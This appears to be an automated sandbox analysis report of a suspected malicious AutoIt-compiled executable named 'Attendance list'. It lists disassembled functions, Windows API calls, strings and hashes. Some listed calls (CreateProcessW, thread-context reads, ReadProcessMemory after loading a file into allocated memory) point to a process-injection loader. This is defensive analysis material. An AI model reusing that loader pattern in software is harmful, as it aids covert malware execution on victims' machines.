                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                        • String ID: TaskbarCreated
                        • API String ID: 129472671-2362178303
                        • Opcode ID: 64900485f803844870e9f1a5b1630fb1ac33fb12e925ce821ff8b8db9117c151
                        • Instruction ID: 3da8f11c975c524b2cdf0119bb873c1df4a7eeb04ab30bfee909394dde500bb6
                        • Opcode Fuzzy Hash: 64900485f803844870e9f1a5b1630fb1ac33fb12e925ce821ff8b8db9117c151
                        • Instruction Fuzzy Hash: 8241D5B2218209BBDF246B68EC09F793775FB11304F14412DF606CA3A1DA74DA52B7A2
                        Function 008C3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                        Download Yara Rule

                        Control-flow Graph

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                        • API String ID: 1825951767-3513169116
                        • Opcode ID: 81a8880d4a98ede9de3f94bf491c20a181bcfdf8379f132adcd494e86f583997
                        • Instruction ID: 5052514ceec6c52b475f000fa561defcbad70e31db96a794d778a6f280bcfc06
                        • Opcode Fuzzy Hash: 81a8880d4a98ede9de3f94bf491c20a181bcfdf8379f132adcd494e86f583997
                        • Instruction Fuzzy Hash: FBA13D7281022D9ACB14EBA8CC95EEEB7B8FF15300F04446DE556E7191EF74DA09CB61
                        Function 00E825C0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 942 e825c0-e8266e call e80000 945 e82675-e8269b call e834d0 CreateFileW 942->945 948 e8269d 945->948 949 e826a2-e826b2 945->949 950 e827ed-e827f1 948->950 954 e826b9-e826d3 VirtualAlloc 949->954 955 e826b4 949->955 952 e82833-e82836 950->952 953 e827f3-e827f7 950->953 956 e82839-e82840 952->956 957 e827f9-e827fc 953->957 958 e82803-e82807 953->958 959 e826da-e826f1 ReadFile 954->959 960 e826d5 954->960 955->950 961 e82842-e8284d 956->961 962 e82895-e828aa 956->962 957->958 963 e82809-e82813 958->963 964 e82817-e8281b 958->964 969 e826f8-e82738 VirtualAlloc 959->969 970 e826f3 959->970 960->950 971 e8284f 961->971 972 e82851-e8285d 961->972 965 e828ba-e828c2 962->965 966 e828ac-e828b7 VirtualFree 962->966 963->964 967 e8282b 964->967 968 e8281d-e82827 964->968 966->965 967->952 968->967 973 e8273a 969->973 974 e8273f-e8275a call e83720 969->974 970->950 971->962 975 e8285f-e8286f 972->975 976 e82871-e8287d 972->976 973->950 982 e82765-e8276f 974->982 978 e82893 975->978 979 e8288a-e82890 976->979 980 e8287f-e82888 976->980 978->956 979->978 980->978 983 e82771-e827a0 call e83720 982->983 984 e827a2-e827b6 call e83530 982->984 983->982 990 e827b8 984->990 991 e827ba-e827be 984->991 990->950 992 e827ca-e827ce 991->992 993 e827c0-e827c4 FindCloseChangeNotification 991->993 994 e827de-e827e7 992->994 995 e827d0-e827db VirtualFree 992->995 993->992 994->945 994->950 995->994
                        APIs
                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E82691
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E828B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995831329.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e80000_Attendance list.jbxd
                        Similarity
                        • API ID: CreateFileFreeVirtual
                        • String ID:
                        • API String ID: 204039940-0
                        • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                        • Instruction ID: 174bf602c63df482617a817bb103a8606db7a6759d659bb943824638c91860ea
                        • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                        • Instruction Fuzzy Hash: 59A11674E00208EBDF14DFA4C894BEEB7B5BF48704F20955DE609BB280D7759A81DBA4
                        Function 008C39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1073 8c39e7-8c3a57 CreateWindowExW * 2 ShowWindow * 2
                        APIs
                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008C3A15
                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008C3A36
                        • ShowWindow.USER32(00000000,?,?), ref: 008C3A4A
                        • ShowWindow.USER32(00000000,?,?), ref: 008C3A53
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$CreateShow
                        • String ID: AutoIt v3$edit
                        • API String ID: 1584632944-3779509399
                        • Opcode ID: 801779761ec9b7c365a0e1b4c3633f16019c64bcdda3e6e75b71cfcbdb545d36
                        • Instruction ID: cccbae7582c6ec8485860fc645a5d6c44dd5e91903d420f577cf98ddbe278158
                        • Opcode Fuzzy Hash: 801779761ec9b7c365a0e1b4c3633f16019c64bcdda3e6e75b71cfcbdb545d36
                        • Instruction Fuzzy Hash: 88F03A706652907EEA3017236C18F273E7DD7C7F51B00006AB910EA270C2A50800EBB0
                        Function 00E823B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1074 e823b0-e824c0 call e80000 call e822a0 CreateFileW 1081 e824c2 1074->1081 1082 e824c7-e824d7 1074->1082 1083 e82577-e8257c 1081->1083 1085 e824d9 1082->1085 1086 e824de-e824f8 VirtualAlloc 1082->1086 1085->1083 1087 e824fa 1086->1087 1088 e824fc-e82513 ReadFile 1086->1088 1087->1083 1089 e82515 1088->1089 1090 e82517-e82551 call e822e0 call e812a0 1088->1090 1089->1083 1095 e8256d-e82575 ExitProcess 1090->1095 1096 e82553-e82568 call e82330 1090->1096 1095->1083 1096->1095
                        APIs
                          • Part of subcall function 00E822A0: Sleep.KERNELBASE(000001F4), ref: 00E822B1
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E824B6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995831329.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e80000_Attendance list.jbxd
                        Similarity
                        • API ID: CreateFileSleep
                        • String ID: ST30DJL8F2G3VKNT
                        • API String ID: 2694422964-2070622328
                        • Opcode ID: f02317559908005f97d00a1ef0eebc57c355d806fbf0f5cd98eb381e9f0e8a77
                        • Instruction ID: 6689faa2c0283031d8629d73d40abe68829889e1a29ead741b45c679f12f1c6b
                        • Opcode Fuzzy Hash: f02317559908005f97d00a1ef0eebc57c355d806fbf0f5cd98eb381e9f0e8a77
                        • Instruction Fuzzy Hash: E5516E30D54249EBEF11EBA4C814BEEBBB9AF44304F104199E60CBB2C0D7790B45CBA6
                        Function 008C410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1098 8c410d-8c4123 1099 8c4129-8c413e call 8c7b76 1098->1099 1100 8c4200-8c4204 1098->1100 1103 8fd5dd-8fd5ec LoadStringW 1099->1103 1104 8c4144-8c4164 call 8c7d2c 1099->1104 1106 8fd5f7-8fd60f call 8c7c8e call 8c7143 1103->1106 1104->1106 1109 8c416a-8c416e 1104->1109 1116 8c417e-8c41fb call 8e3020 call 8c463e call 8e2ffc Shell_NotifyIconW call 8c5a64 1106->1116 1120 8fd615-8fd633 call 8c7e0b call 8c7143 call 8c7e0b 1106->1120 1110 8c4174-8c4179 call 8c7c8e 1109->1110 1111 8c4205-8c420e call 8c81a7 1109->1111 1110->1116 1111->1116 1116->1100 1120->1116
                        APIs
                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008FD5EC
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                        • _memset.LIBCMT ref: 008C418D
                        • _wcscpy.LIBCMT ref: 008C41E1
                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008C41F1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                        • String ID: Line:
                        • API String ID: 3942752672-1585850449
                        • Opcode ID: bcbe38b987fd120061a92340ce782cb6040016fb5dc4af2b896aa66f1594b7c3
                        • Instruction ID: bc21d099e7ca0ec697ae71641f8dff0829feaa5c32a12b1774a20f8ac1fd2058
                        • Opcode Fuzzy Hash: bcbe38b987fd120061a92340ce782cb6040016fb5dc4af2b896aa66f1594b7c3
                        • Instruction Fuzzy Hash: 4231AF710083059AD721EB64DC46FDA77F8FB44314F14451EB195D61A2DB74E688CB93
                        Function 008E564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1133 8e564d-8e5666 1134 8e5668-8e566d 1133->1134 1135 8e5683 1133->1135 1134->1135 1137 8e566f-8e5671 1134->1137 1136 8e5685-8e568b 1135->1136 1138 8e568c-8e5691 1137->1138 1139 8e5673-8e5678 call 8e8d68 1137->1139 1141 8e569f-8e56a3 1138->1141 1142 8e5693-8e569d 1138->1142 1149 8e567e call 8e8ff6 1139->1149 1145 8e56a5-8e56b0 call 8e3020 1141->1145 1146 8e56b3-8e56b5 1141->1146 1142->1141 1144 8e56c3-8e56d2 1142->1144 1147 8e56d9 1144->1147 1148 8e56d4-8e56d7 1144->1148 1145->1146 1146->1139 1151 8e56b7-8e56c1 1146->1151 1152 8e56de-8e56e3 1147->1152 1148->1152 1149->1135 1151->1139 1151->1144 1155 8e57cc-8e57cf 1152->1155 1156 8e56e9-8e56f0 1152->1156 1155->1136 1157 8e56f2-8e56fa 1156->1157 1158 8e5731-8e5733 1156->1158 1157->1158 1159 8e56fc 1157->1159 1160 8e579d-8e579e call 8f0df7 1158->1160 1161 8e5735-8e5737 1158->1161 1162 8e57fa 1159->1162 1163 8e5702-8e5704 1159->1163 1172 8e57a3-8e57a7 1160->1172 1165 8e575b-8e5766 1161->1165 1166 8e5739-8e5741 1161->1166 1171 8e57fe-8e5807 1162->1171 1169 8e570b-8e5710 1163->1169 1170 8e5706-8e5708 1163->1170 1167 8e576a-8e576d 1165->1167 1168 8e5768 1165->1168 1173 8e5743-8e574f 1166->1173 1174 8e5751-8e5755 1166->1174 1177 8e576f-8e577b call 8e4916 call 8f10ab 1167->1177 1178 8e57d4-8e57d8 1167->1178 1168->1167 1169->1178 1179 8e5716-8e572f call 8f0f18 1169->1179 1170->1169 1171->1136 1172->1171 1175 8e57a9-8e57ae 1172->1175 1176 8e5757-8e5759 1173->1176 1174->1176 1175->1178 1180 8e57b0-8e57c1 1175->1180 1176->1167 1194 8e5780-8e5785 1177->1194 1181 8e57ea-8e57f5 call 8e8d68 1178->1181 1182 8e57da-8e57e7 call 8e3020 1178->1182 1193 8e5792-8e579b 1179->1193 1185 8e57c4-8e57c6 1180->1185 1181->1149 1182->1181 1185->1155 1185->1156 1193->1185 1195 8e580c-8e5810 1194->1195 1196 8e578b-8e578e 1194->1196 1195->1171 1196->1162 1197 8e5790 1196->1197 1197->1193
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                        • String ID:
                        • API String ID: 1559183368-0
                        • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                        • Instruction ID: 6e4c3ed0f4301c8691e9f20194b7c6b82d5a0d7fec19c68765346a032439d4cb
                        • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                        • Instruction Fuzzy Hash: 9D51B630A00B89DBDB249F7ACC8456E77A1FF52328F248729F835D62E1DB709D608B51
                        Function 008C69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008C4F6F
                        • _free.LIBCMT ref: 008FE68C
                        • _free.LIBCMT ref: 008FE6D3
                          • Part of subcall function 008C6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008C6D0D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _free$CurrentDirectoryLibraryLoad
                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                        • API String ID: 2861923089-1757145024
                        • Opcode ID: 789eabe74d950363bccaa726f7a8c9a0b6937578a44e287b658e481cb3770ca4
                        • Instruction ID: bca8443ba7cd02e8336d5364be407d05e07b2520b165fc5ecc03f76c38c14920
                        • Opcode Fuzzy Hash: 789eabe74d950363bccaa726f7a8c9a0b6937578a44e287b658e481cb3770ca4
                        • Instruction Fuzzy Hash: DC916B7191061DAFCF04EFA8C891AEDB7B4FF19314B14442EE915EB2A1EB34E944CB61
                        Function 008C35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008C35A1,SwapMouseButtons,00000004,?), ref: 008C35D4
                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008C35A1,SwapMouseButtons,00000004,?,?,?,?,008C2754), ref: 008C35F5
                        • RegCloseKey.KERNELBASE(00000000,?,?,008C35A1,SwapMouseButtons,00000004,?,?,?,?,008C2754), ref: 008C3617
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID: Control Panel\Mouse
                        • API String ID: 3677997916-824357125
                        • Opcode ID: cfc0f997f4075ae519c686bdd3df8bd78157e4551f2a44bad1300e09d87a348a
                        • Instruction ID: cc9cf4d5bed5ad9623a06a8c6f662e89926a96bea3868cc66d3c214861430719
                        • Opcode Fuzzy Hash: cfc0f997f4075ae519c686bdd3df8bd78157e4551f2a44bad1300e09d87a348a
                        • Instruction Fuzzy Hash: DD114575614208BFDB218FA4DC80EAEBBB8FF55740F018469E805E7210E272DE41ABA0
                        Function 00E812A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00E81A5B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E81AF1
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E81B13
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995831329.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e80000_Attendance list.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                        • Instruction ID: 8bc6d58c1472322620dde4e6a26db520f960832ed659c93cddb55e4317b93933
                        • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                        • Instruction Fuzzy Hash: DC620930A14258DBEB24DFA4C850BDEB376EF58304F1091A9D10DFB290E77A9E81CB59
                        Function 009297E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C5045: _fseek.LIBCMT ref: 008C505D
                          • Part of subcall function 009299BE: _wcscmp.LIBCMT ref: 00929AAE
                          • Part of subcall function 009299BE: _wcscmp.LIBCMT ref: 00929AC1
                        • _free.LIBCMT ref: 0092992C
                        • _free.LIBCMT ref: 00929933
                        • _free.LIBCMT ref: 0092999E
                          • Part of subcall function 008E2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,008E9C64), ref: 008E2FA9
                          • Part of subcall function 008E2F95: GetLastError.KERNEL32(00000000,?,008E9C64), ref: 008E2FBB
                        • _free.LIBCMT ref: 009299A6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                        • String ID:
                        • API String ID: 1552873950-0
                        • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                        • Instruction ID: ff68b0c57a07dc76a0bb61aa808a802c94c971a5c35ac182afc792c77fea7722
                        • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                        • Instruction Fuzzy Hash: 2C515AB1904658AFDF249F69DC81B9EBBB9FF48310F0004AEB609E7241DB315A808F59
                        Function 008E493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                        • String ID:
                        • API String ID: 2782032738-0
                        • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                        • Instruction ID: f3d4aab9881bb65226c42f37cf9cd93ef15e38c1785cc6674d66084d905a8657
                        • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                        • Instruction Fuzzy Hash: 7641263060078A9BCF28DEABC8809AF7BA6FF86360B20917DE85DD7651D730DD408B44
                        Function 008C73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 008FEE62
                        • GetOpenFileNameW.COMDLG32(?), ref: 008FEEAC
                          • Part of subcall function 008C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C48A1,?,?,008C37C0,?), ref: 008C48CE
                          • Part of subcall function 008E09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008E09F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Name$Path$FileFullLongOpen_memset
                        • String ID: X
                        • API String ID: 3777226403-3081909835
                        • Opcode ID: 4ba776d0e313ceb9181c383a3c61236bcdd6416dd84059f9c868b5f4cd8d12b3
                        • Instruction ID: 80e738767f4e5a483afc62ebd8706d407411f5d1e04666694792394e2ab3b5f9
                        • Opcode Fuzzy Hash: 4ba776d0e313ceb9181c383a3c61236bcdd6416dd84059f9c868b5f4cd8d12b3
                        • Instruction Fuzzy Hash: D121D83191425C9BCF15DF98D845BEE7BF8EF49314F00805AE508E7241DBF499898FA2
                        Function 0092901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __fread_nolock_memmove
                        • String ID: EA06
                        • API String ID: 1988441806-3962188686
                        • Opcode ID: e1ba35adb5618f6c748f41ff1f9ffa7b7a33ead78ab52a0ef9dab2f298ac15d2
                        • Instruction ID: 77e54c8dd848cb4483aadf7e58c6f3e9d757d071665d1a1516984afe2ca9954d
                        • Opcode Fuzzy Hash: e1ba35adb5618f6c748f41ff1f9ffa7b7a33ead78ab52a0ef9dab2f298ac15d2
                        • Instruction Fuzzy Hash: 3701F9729042687EDB28CAA9D816FFE7BFCDB01305F00419AF552D2181E575A6088761
                        Function 00929B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                        Download Yara Rule
                        APIs
                        • GetTempPathW.KERNEL32(00000104,?), ref: 00929B82
                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00929B99
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Temp$FileNamePath
                        • String ID: aut
                        • API String ID: 3285503233-3010740371
